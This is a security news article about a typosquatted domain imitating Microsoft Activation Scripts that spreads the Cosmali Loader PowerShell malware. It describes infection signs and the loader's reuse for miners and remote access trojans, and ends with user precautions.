Beware of Cosmali Loader Malware Spreading via Fake MAS Domains on Windows
Security researchers have detected a malicious fake domain impersonating Microsoft Activation Scripts (MAS), a popular Windows activation tool, which is being used to distribute a dangerous PowerShell-based malware known as Cosmali Loader. The incident was first reported by multiple users on Reddit and later confirmed through an in-depth investigation by technology news outlet BleepingComputer.
The attack relies on a technique called typosquatting, where attackers register domains that closely resemble legitimate ones. In this case, users attempting to activate Windows may accidentally mistype the official MAS domain from get.activated.win to get.activate[.]win, missing just a single letter. That small mistake is enough to trigger the download and execution of a malicious PowerShell script on the victim’s Windows system.
Once executed, the script displays a pop-up warning claiming that the computer has been infected with Cosmali Loader, urging users to reinstall Windows immediately for safety. According to the warning message, the malware operates with an insecure control panel, meaning that anyone with access to it could potentially take full control of infected machines.
Early signs of infection can be spotted through Task Manager. Users may notice multiple PowerShell processes running simultaneously and consuming unusually high system resources—an indicator that the system may already be compromised.
Security researcher RussianPanda provided additional insight, explaining that Cosmali Loader is an open-source malware loader commonly abused to deploy cryptocurrency miners or highly dangerous remote access trojans such as XWorm (RAT). This aligns with similar alerts previously identified by analysts at GDATA, suggesting that this malware family has been actively reused in multiple attack campaigns.
At present, it remains unclear who is responsible for sending the warning messages to victims. There is speculation that a security researcher may have gained access to the malware’s control panel and used it to alert affected users about the breach. Meanwhile, the legitimate MAS project maintainers have issued a public warning, urging users to carefully verify command syntax and domain names before executing any scripts.
Although Microsoft Activation Scripts remain widely used, cybersecurity experts strongly caution against running unofficial tools or executing remote scripts without fully understanding their behavior. Users are advised to avoid copy-pasting commands from unverified sources and to test scripts in a sandboxed environment whenever possible. These precautions are critical to reducing the risk of falling victim to fake domains and malware disguised as free utilities.
Origin: Bleepingcomputer
